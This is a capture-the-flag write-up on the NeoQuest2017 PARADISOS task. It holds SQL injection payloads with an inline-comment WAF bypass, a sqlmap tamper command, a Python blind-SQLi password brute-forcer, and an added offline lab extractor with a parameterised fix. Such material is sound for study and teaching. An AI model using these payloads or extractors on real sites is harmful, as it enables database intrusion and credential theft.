
[NeoQuest2017] “In Search of Earthlings” and not only ...


A couple of days ago the next qualifying online stage of the annual cyber-security competition, NeoQuest2017, came to an end. Special thanks to the organizers: every year the story gets more interesting and the tasks get harder!

This article is devoted to the analysis of the ninth task, PARADISOS:

"SEARCHING FOR EARTH"

Having reached the ship of the expedition in distress, we found no one there; apparently the guys managed to get out. But where to look for them now? In theory they could have reached the planet Paradisos, the last one we have not yet visited.

This planet is a heavenly place: a wonderful climate, friendly inhabitants who greeted us joyfully with flowers and strange fruit, funny music, and a crowd of happy aliens of every familiar and unfamiliar race. Mini-hotels floating in the air, billboards in various languages (including Earth English). We were solemnly escorted to a beautiful hotel and promised full assistance in finding the members of the expedition and in sharing knowledge about our planets. We managed to find out that the guys really had been here and had even created their own website, on which each of them kept records of their space travels.

The site address has been preserved, but we saw only the names of four researchers there. It turned out that the clever aliens demand money for access to the complete information. Of course, we will not pay. Let's try to "hack" it!

Attached to the task is the address of a site, which looks like this:



First of all, let's figure out where the text of each "researcher's" biography comes from:

```javascript
$("#DanielButton").click(function(){
  $.ajax({
    url: "/bio/bio.php?name=Daniel",
    success: function(result){
      $("#ScientistBio").html(result);
      $("#Avatar").show();
      $("#Avatar").attr("src", "img/lava.png");
    }
  });
});
```

Following the link ./bio/bio.php?name=Daniel returns the text of the biography. Logically, the first thought that occurred to me on this page (and, I hope, to you, %username%, too) was to try SQL injection in the name parameter.

We try:

name=Daniel'+or+1=1+--+1

And in response we get:

Forbidden
You don't have permission to access /bio/bio.php on this server.

So the site is protected by a WAF. Well, that makes it more interesting: it means there is something to protect!
It was established experimentally that "information_schema", "database()", "SELECT *" and "UNION" are forbidden. Onward...

We try:

name=Dan'+'i'+'el

And Daniel's biography comes back. So the single quote really does close the string literal, and the backend (evidently MySQL) concatenates the adjacent literals 'Dan' 'i' 'el' back into 'Daniel'. Neither the quote nor the space by itself upsets the WAF, so it must be matching a keyword followed by whitespace. Let's try another way, swapping the space after the keyword for an inline comment:

name=Daniel'+or/**_**/1=1+--+1

Bingo! In response we got the biographies of all six researchers (not four, as on the main page): Roy, Ohad, Naomi, Daniel, Baldric and Sigizmund. The biography of the last one reads: "Like ctf and space!". But the key is nowhere to be seen, so we need to dig deeper!

I decided to bring out the heavy artillery: sqlmap ¯\_(ツ)_/¯
My first N attempts to get sqlmap to pick up the SQLi were a fiasco: it could not see a vector at all, and the responses were a long stream of "403 Forbidden".

Having configured the WAF bypass properly (a tamper script was needed for this; I ended up writing my own crude one using the same technique as space2morecomment, adding only the PREFIX and SUFFIX at the beginning and end), for normal people it could look like this:

sqlmap -u "http://IP_ADDRESS/bio/bio.php?name=*" --level=5 --risk=3 --tamper="space2morecomment" --prefix="-1%27%20" --suffix="%20--%201"

PWNED:

```
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://IP_ADDRESS:80/bio/bio.php?name=-1' OR 228=228 -- 1
    Vector: OR [INFERENCE]
```

However, it was too early to rejoice: sqlmap stubbornly kept using the forbidden "words", and the most that could be done with it was to use --sql-shell:


In any case, my guess was confirmed: a boolean-based blind SQLi. Remembering a couple of DIY lessons, I knocked together this:

Achtung! Causes keyboard cancer

```python
#!/usr/bin/python3
import requests
from multiprocessing.dummy import Pool as ThreadPool
import sys
import subprocess
import time

pool = ThreadPool(101)
pos = 1        # current character position in the password
passwd = ''


def getSockCount():
    # Count open sockets to the target so we can wait for the burst of
    # parallel requests to drain before the next round.
    proc = subprocess.Popen(['bash', '-c', 'ss | grep IP_ADDRESS | wc -l'],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    output = proc.communicate()[0]
    return int(output.decode())


# Send the boolean probe: spaces in the condition are swapped for inline
# comments so the WAF never sees an "or 1=1"-style pattern.
def connect(sql):
    url = ("http://IP_ADDRESS/bio/bio.php?name=-1' or/** **/(case/** **/when/** **/%s"
           "/** **/then/** **/1/** **/else/** **/0/** **/end)=1 -- 1")
    req = requests.get(url % sql.replace(' ', '/** **/'))
    # A true condition returns every biography; a false one returns nothing.
    if 'Hello! My name is' in req.text:
        return True
    return False


def findColumns(item):
    if item.isdigit():
        return
    # An unknown column makes the query fail, so only real columns answer "true".
    sql = "%s>'0'" % item
    if connect(sql):
        print('Column: %s' % item)


def getFieldValue(item):
    global passwd
    sql = "id=6 and substring(password,%d,1)='%s'" % (pos, item)
    if connect(sql):
        passwd += item


alph = [chr(x) for x in range(ord('a'), ord('z') + 1)] + \
       [chr(x) for x in range(ord('0'), ord('9') + 1)] + \
       ['`', '~', '!', '@', '#', '$', '^', '&', '*', '(', ')', '_', '-', '+', '=',
        '[', ']', '{', '}', ';', ':', '\\', '|', '?', '/']

if len(sys.argv) > 1:
    # Brute-force column names from a wordlist passed as the first argument.
    tables = open(sys.argv[1]).read().splitlines()
    pool.map(findColumns, tables)
    while getSockCount() > 2:
        time.sleep(1)
else:
    # Brute-force the password of id=6 one character at a time.
    while True:
        before = len(passwd)
        pool.map(getFieldValue, alph)
        while getSockCount() > 2:
            time.sleep(1)
        if len(passwd) == before:
            break      # nothing matched: end of the value (or a symbol outside alph)
        pos += 1
        print(passwd)
```


Using this script, the following columns were found: "id" and "password". It was decided to start brute-forcing with the user id = 6 (a.k.a. Sigizmund). One caveat: under MySQL's default case-insensitive collations the `=` comparison on substring() would not distinguish upper from lower case, but the value here turned out to be lowercase hex, so it made no difference. In the end it looked something like this:
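As an added example (not the write-up's code and not the NeoQuest task's code), here is the whole chain above in one offline, runnable form: the injectable query pattern behind bio.php, an assumed WAF rule set that blocks "or" followed by whitespace, information_schema, database(, SELECT * and UNION the way the real one appeared to, the same space-to-inline-comment probe the script uses, and a boolean-based blind extractor that binary-searches the character code instead of spraying a guessed alphabet. SQLite stands in for the MySQL backend, so unicode() plays the role of MySQL's ascii(), and the users, their bios and the secret are constructed. The parameterised bio_php_fixed shows the same payload going nowhere once the name is bound instead of pasted into the literal.

```python
import re
import sqlite3

# Constructed offline stand-in for the task's bio.php backend. The real site ran
# MySQL; SQLite is used here so the example runs anywhere. Row 6 holds a made-up
# secret with mixed case and punctuation to show the extractor needs no alphabet.
SECRET = "Ctf_AND_sp4ce!"


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, bio TEXT, password TEXT);
        INSERT INTO users VALUES
          (1,'Roy','Hello! My name is Roy','pw1'),
          (2,'Ohad','Hello! My name is Ohad','pw2'),
          (3,'Naomi','Hello! My name is Naomi','pw3'),
          (4,'Daniel','Hello! My name is Daniel','pw4'),
          (5,'Baldric','Hello! My name is Baldric','pw5'),
          (6,'Sigizmund','Hello! My name is Sigizmund. Like ctf and space!','%s');
    """ % SECRET)
    return db


# Assumed WAF rules in the spirit of the ones the write-up ran into; the real rule
# set was never published, these just block what the author observed being blocked.
WAF_RULES = [r"\bor\s+\S", r"information_schema", r"database\s*\(",
             r"select\s+\*", r"\bunion\b"]


def waf_blocks(name):
    return any(re.search(p, name, re.I) for p in WAF_RULES)


def bio_php_vulnerable(db, name):
    """The injectable pattern: the name is pasted into a quoted literal."""
    if waf_blocks(name):
        return "Forbidden"
    try:
        rows = db.execute("SELECT bio FROM users WHERE name='%s'" % name).fetchall()
    except sqlite3.Error:
        return ""          # assumed: the page shows nothing on a query error
    return "\n".join(r[0] for r in rows)


def bio_php_fixed(db, name):
    """Same query with a bound parameter: the name can never leave the literal."""
    rows = db.execute("SELECT bio FROM users WHERE name=?", (name,)).fetchall()
    return "\n".join(r[0] for r in rows)


def payload(cond):
    """Build the write-up's boolean probe: break out, OR in a CASE on cond, and
    replace spaces with inline comments so the WAF never sees 'or<space>'.
    The space after '--' is kept: MySQL only treats '-- ' as a comment when
    whitespace follows it."""
    body = "-1' or (case when %s then 1 else 0 end)=1" % cond
    return body.replace(" ", "/** **/") + " -- 1"


def oracle(db, cond):
    # True condition: every row matches and the bios come back. False: empty page.
    return "Hello! My name is" in bio_php_vulnerable(db, payload(cond))


def column_exists(db, column):
    # Unknown column -> SQL error -> empty page -> False (the author used col>'0').
    return oracle(db, "%s is not null" % column)


def extract(db, column, row_id, charfn="unicode", maxlen=64):
    """Pull one field byte by byte with a binary search on the character code:
    8 requests per character instead of one per alphabet symbol, and no dependence
    on a guessed alphabet or on a case-insensitive collation.
    charfn is 'unicode' on SQLite; on MySQL use 'ascii' (or 'ord')."""
    out = ""
    for pos in range(1, maxlen + 1):
        if not oracle(db, "id=%d and length(%s)>=%d" % (row_id, column, pos)):
            break                      # past the end of the value
        lo, hi = 0, 127                # ASCII range; widen for multibyte data
        while lo < hi:
            mid = (lo + hi + 1) // 2
            probe = "id=%d and %s(substr(%s,%d,1))>=%d" % (row_id, charfn, column, pos, mid)
            if oracle(db, probe):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(bio_php_vulnerable(db, "Daniel' or 1=1 -- 1"))     # Forbidden
    print(column_exists(db, "password"), column_exists(db, "nope"))
    print(extract(db, "password", 6))                        # the seeded secret
    print(repr(bio_php_fixed(db, payload("1=1"))))           # '' : no such name
```

On the real target the only changes would be swapping the local call in oracle() for an HTTP request to bio.php and setting charfn to ascii. Comparing character codes with >= rather than testing equality against each candidate symbol is what lets the binary search recover mixed-case and punctuation values that a `substring(...)='x'` loop over a lowercase alphabet would silently skip or, under a case-insensitive collation, misreport.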



In the end, humans won! Flag: 14eb6641da38addf613424f5cd05357ce261c305

Source: https://habr.com/ru/post/323778/

